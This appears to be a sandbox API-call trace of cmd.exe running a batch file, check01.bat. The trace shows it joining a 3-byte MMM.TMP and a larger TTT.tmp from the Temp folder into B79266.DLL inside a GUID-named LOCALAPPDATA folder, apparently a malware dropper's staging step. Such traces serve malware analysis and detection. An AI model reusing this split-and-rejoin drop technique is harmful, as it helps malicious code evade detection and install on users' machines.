[0377.282] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0377.282] GetProcessHeap () returned 0x200000
[0377.282] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0377.282] GetProcessHeap () returned 0x200000
[0377.282] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0377.282] GetProcessHeap () returned 0x200000
[0377.283] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0377.283] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.283] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0377.283] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xebb, lpOverlapped=0x0) returned 1
[0377.283] SetFilePointer (in: hFile=0x64, lDistanceToMove=228, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0377.283] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="COPY /B \"%TEMP%\\MMM.TMP\"+\"%TEMP%\\TTT.TMP\" %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL \r\n", cbMultiByte=109, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="COPY /B \"%TEMP%\\MMM.TMP\"+\"%TEMP%\\TTT.TMP\" %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL \r\n") returned 109
[0377.284] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.284] GetFileType (hFile=0x64) returned 0x1
[0377.284] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.284] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0377.284] GetProcessHeap () returned 0x200000
[0377.284] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.284] GetProcessHeap () returned 0x200000
[0377.284] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.284] GetProcessHeap () returned 0x200000
[0377.284] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.284] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.284] GetProcessHeap () returned 0x200000
[0377.285] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.285] GetProcessHeap () returned 0x200000
[0377.285] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.286] GetProcessHeap () returned 0x200000
[0377.286] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.286] GetProcessHeap () returned 0x200000
[0377.286] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0377.286] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.286] GetProcessHeap () returned 0x200000
[0377.286] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0377.286] GetProcessHeap () returned 0x200000
[0377.287] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.287] GetProcessHeap () returned 0x200000
[0377.287] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.287] GetProcessHeap () returned 0x200000
[0377.287] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x2a) returned 0x216cf0
[0377.288] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x20
[0377.288] GetProcessHeap () returned 0x200000
[0377.288] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216cf0 | out: hHeap=0x200000) returned 1
[0377.288] GetProcessHeap () returned 0x200000
[0377.289] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.289] GetProcessHeap () returned 0x200000
[0377.290] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.290] _tell (_FileHandle=3) returned 228
[0377.290] _close (_FileHandle=3) returned 0
[0377.290] _wcsicmp (_String1="COPY", _String2="DIR") returned -1
[0377.291] _wcsicmp (_String1="COPY", _String2="ERASE") returned -2
[0377.291] _wcsicmp (_String1="COPY", _String2="DEL") returned -1
[0377.291] _wcsicmp (_String1="COPY", _String2="TYPE") returned -17
[0377.291] _wcsicmp (_String1="COPY", _String2="COPY") returned 0
[0377.291] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.292] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f10, Size=0x17c) returned 0x218f10
[0377.292] GetProcessHeap () returned 0x200000
[0377.292] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f10) returned 0x17c
[0377.292] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0377.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a28c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0377.293] GetProcessHeap () returned 0x200000
[0377.293] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x219a30
[0377.293] GetProcessHeap () returned 0x200000
[0377.293] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x2018d0
[0377.293] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x2190a0, Size=0x180) returned 0x2190a0
[0377.293] GetProcessHeap () returned 0x200000
[0377.293] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x2190a0) returned 0x180
[0377.293] _wcsnicmp (_String1="/B", _String2="/Y", _MaxCount=0x2) returned -23
[0377.295] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\mmm.tmp")) returned 0x2020
[0377.295] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x1ef068, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x1ef068, ReturnLength=0x0) returned 0x0
[0377.296] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x1ef064, ProcessInformationLength=0x4) returned 0x0
[0377.296] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1e10000
[0377.296] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\mmm.tmp"), fInfoLevelId=0x1, lpFindFileData=0x219240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x219240) returned 0x219770
[0377.296] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ee0e8 | out: _Buffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\r\n") returned 46
[0377.296] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.296] GetFileType (hFile=0x7) returned 0x2
[0377.297] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.297] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ee078 | out: lpMode=0x1ee078) returned 1
[0377.298] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.298] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a296340*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0x1ee0b8, lpReserved=0x0 | out: lpBuffer=0x4a296340*, lpNumberOfCharsWritten=0x1ee0b8*=0x2e) returned 1
[0377.299] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", nBufferLength=0x104, lpBuffer=0x1ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", lpFilePart=0x0) returned 0x52
[0377.299] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP", _String2="con") returned -53
[0377.299] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\mmm.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee0a0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x5c
[0377.299] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3
[0377.299] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.299] GetFileType (hFile=0x5c) returned 0x1
[0377.300] SetErrorMode (uMode=0x0) returned 0x0
[0377.300] SetErrorMode (uMode=0x1) returned 0x0
[0377.300] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP", nBufferLength=0x208, lpBuffer=0x1ee9c0, lpFilePart=0x1ee0f0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP", lpFilePart=0x1ee0f0*="MMM.TMP") returned 0x2c
[0377.300] SetErrorMode (uMode=0x0) returned 0x1
[0377.300] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.300] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0x3, lpOverlapped=0x0) returned 1
[0377.300] SetErrorMode (uMode=0x0) returned 0x0
[0377.301] SetErrorMode (uMode=0x1) returned 0x0
[0377.301] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", nBufferLength=0x208, lpBuffer=0x1edcb0, lpFilePart=0x1edca0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", lpFilePart=0x1edca0*="B79266.DLL") returned 0x52
[0377.301] SetErrorMode (uMode=0x0) returned 0x1
[0377.301] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP", _String2="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL") returned 7
[0377.301] GetProcessHeap () returned 0x200000
[0377.301] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21dfb0
[0377.301] _wcsicmp (_String1="B79266.DLL", _String2=".") returned 52
[0377.301] _wcsicmp (_String1="B79266.DLL", _String2="..") returned 52
[0377.301] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")) returned 0xffffffff
[0377.302] GetLastError () returned 0x2
[0377.302] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", nBufferLength=0x104, lpBuffer=0x1ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", lpFilePart=0x0) returned 0x52
[0377.302] SetErrorMode (uMode=0x0) returned 0x0
[0377.302] SetErrorMode (uMode=0x1) returned 0x0
[0377.302] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", nBufferLength=0x208, lpBuffer=0x1edcb0, lpFilePart=0x1edca0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", lpFilePart=0x1edca0*="B79266.DLL") returned 0x52
[0377.302] SetErrorMode (uMode=0x0) returned 0x1
[0377.302] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP", _String2="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL") returned 7
[0377.302] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")) returned 0xffffffff
[0377.303] _wcsicmp (_String1="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", _String2="con") returned -53
[0377.303] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ee0a0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xffffffffffffffff
[0377.303] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ee0a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x6c
[0377.304] _open_osfhandle (_OSFileHandle=0x6c, _Flags=8) returned 4
[0377.306] _get_osfhandle (_FileHandle=4) returned 0x6c
[0377.306] WriteFile (in: hFile=0x6c, lpBuffer=0x1e10000*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x1ee0c0, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesWritten=0x1ee0c0*=0x3, lpOverlapped=0x0) returned 1
[0377.308] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.308] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0x0, lpOverlapped=0x0) returned 1
[0377.309] GetLastError () returned 0x0
[0377.309] _close (_FileHandle=3) returned 0
[0377.309] FindNextFileW (in: hFindFile=0x219770, lpFindFileData=0x219240 | out: lpFindFileData=0x219240*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8bbca60, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf8bbca60, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf8c08d20, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMM.TMP", cAlternateFileName="")) returned 0
[0377.309] GetLastError () returned 0x12
[0377.310] FindClose (in: hFindFile=0x219770 | out: hFindFile=0x219770) returned 1
[0377.310] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp"), fInfoLevelId=0x1, lpFindFileData=0x2194b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2194b0) returned 0x219770
[0377.310] SetErrorMode (uMode=0x0) returned 0x0
[0377.310] SetErrorMode (uMode=0x1) returned 0x0
[0377.310] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", nBufferLength=0x208, lpBuffer=0x1ee5b0, lpFilePart=0x1ee0f0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", lpFilePart=0x1ee0f0*="B79266.DLL") returned 0x52
[0377.310] SetErrorMode (uMode=0x0) returned 0x1
[0377.311] SetErrorMode (uMode=0x0) returned 0x0
[0377.311] SetErrorMode (uMode=0x1) returned 0x0
[0377.311] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", nBufferLength=0x208, lpBuffer=0x1edcb0, lpFilePart=0x1edca0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", lpFilePart=0x1edca0*="TTT.tmp") returned 0x2c
[0377.311] SetErrorMode (uMode=0x0) returned 0x1
[0377.311] _wcsicmp (_String1="C:\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL", _String2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp") returned -7
[0377.311] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ee0e8 | out: _Buffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp\r\n") returned 46
[0377.311] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.311] GetFileType (hFile=0x7) returned 0x2
[0377.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.312] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ee078 | out: lpMode=0x1ee078) returned 1
[0377.313] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.313] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a296340*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0x1ee0b8, lpReserved=0x0 | out: lpBuffer=0x4a296340*, lpNumberOfCharsWritten=0x1ee0b8*=0x2e) returned 1
[0377.314] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", _String2="con") returned -53
[0377.314] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ee0a0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x5c
[0377.314] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3
[0377.314] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.314] GetFileType (hFile=0x5c) returned 0x1
[0377.314] SetErrorMode (uMode=0x0) returned 0x0
[0377.314] SetErrorMode (uMode=0x1) returned 0x0
[0377.315] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", nBufferLength=0x208, lpBuffer=0x1ee9c0, lpFilePart=0x1ee0f0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", lpFilePart=0x1ee0f0*="TTT.tmp") returned 0x2c
[0377.315] SetErrorMode (uMode=0x0) returned 0x1
[0377.315] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.315] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0x200, lpOverlapped=0x0) returned 1
[0377.317] _get_osfhandle (_FileHandle=4) returned 0x6c
[0377.317] SetEndOfFile (hFile=0x6c) returned 1
[0377.318] _get_osfhandle (_FileHandle=4) returned 0x6c
[0377.318] WriteFile (in: hFile=0x6c, lpBuffer=0x1e10000*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1ee0c0, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesWritten=0x1ee0c0*=0x200, lpOverlapped=0x0) returned 1
[0377.318] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.318] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0xfe00, lpOverlapped=0x0) returned 1
[0377.319] _get_osfhandle (_FileHandle=4) returned 0x6c
[0377.319] WriteFile (in: hFile=0x6c, lpBuffer=0x1e10000*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x1ee0c0, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesWritten=0x1ee0c0*=0xfe00, lpOverlapped=0x0) returned 1
[0377.322] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.322] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0xfe00, lpOverlapped=0x0) returned 1
[0377.323] _get_osfhandle (_FileHandle=4) returned 0x6c
[0377.323] WriteFile (in: hFile=0x6c, lpBuffer=0x1e10000*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x1ee0c0, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesWritten=0x1ee0c0*=0xfe00, lpOverlapped=0x0) returned 1
[0377.326] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.326] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0xfe00, lpOverlapped=0x0) returned 1
[0377.327] _get_osfhandle (_FileHandle=4) returned 0x6c
[0377.327] WriteFile (in: hFile=0x6c, lpBuffer=0x1e10000*, nNumberOfBytesToWrite=0xfe00, lpNumberOfBytesWritten=0x1ee0c0, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesWritten=0x1ee0c0*=0xfe00, lpOverlapped=0x0) returned 1
[0377.330] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.330] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0x57fd, lpOverlapped=0x0) returned 1
[0377.331] _get_osfhandle (_FileHandle=4) returned 0x6c
[0377.331] WriteFile (in: hFile=0x6c, lpBuffer=0x1e10000*, nNumberOfBytesToWrite=0x57fd, lpNumberOfBytesWritten=0x1ee0c0, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesWritten=0x1ee0c0*=0x57fd, lpOverlapped=0x0) returned 1
[0377.332] _get_osfhandle (_FileHandle=3) returned 0x5c
[0377.332] ReadFile (in: hFile=0x5c, lpBuffer=0x1e10000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x1ee124, lpOverlapped=0x0 | out: lpBuffer=0x1e10000*, lpNumberOfBytesRead=0x1ee124*=0x0, lpOverlapped=0x0) returned 1
[0377.332] GetLastError () returned 0x0
[0377.332] _close (_FileHandle=3) returned 0
[0377.332] FindNextFileW (in: hFindFile=0x219770, lpFindFileData=0x2194b0 | out: lpFindFileData=0x2194b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99027b00, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0x99027b00, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x353fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTT.tmp", cAlternateFileName="")) returned 0
[0377.332] GetLastError () returned 0x12
[0377.333] FindClose (in: hFindFile=0x219770 | out: hFindFile=0x219770) returned 1
[0377.333] _close (_FileHandle=4) returned 0
[0377.336] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x1ef068, ProcessInformationLength=0x4) returned 0x0
[0377.337] _vsnwprintf (in: _Buffer=0x4a29ad20, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ef048 | out: _Buffer=" 1") returned 9
[0377.337] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.337] GetFileType (hFile=0x7) returned 0x2
[0377.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0377.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eef68 | out: lpMode=0x1eef68) returned 1
[0377.338] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.338] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eefa0 | out: lpConsoleScreenBufferInfo=0x1eefa0) returned 1
[0377.339] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14
[0377.340] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x1ef010 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b
[0377.340] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a296340*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x1eef90, lpReserved=0x0 | out: lpBuffer=0x4a296340*, lpNumberOfCharsWritten=0x1eef90*=0x1b) returned 1
[0377.340] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.341] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.341] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.341] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.342] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.342] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.343] SetConsoleInputExeNameW () returned 0x1
[0377.343] GetConsoleOutputCP () returned 0x1b5
[0377.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.343] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.344] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c
[0377.344] _open_osfhandle (_OSFileHandle=0x6c, _Flags=8) returned 3
[0377.344] _get_osfhandle (_FileHandle=3) returned 0x6c
[0377.344] SetFilePointer (in: hFile=0x6c, lDistanceToMove=228, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0377.344] GetProcessHeap () returned 0x200000
[0377.345] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dfb0 | out: hHeap=0x200000) returned 1
[0377.345] GetProcessHeap () returned 0x200000
[0377.345] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0377.345] GetProcessHeap () returned 0x200000
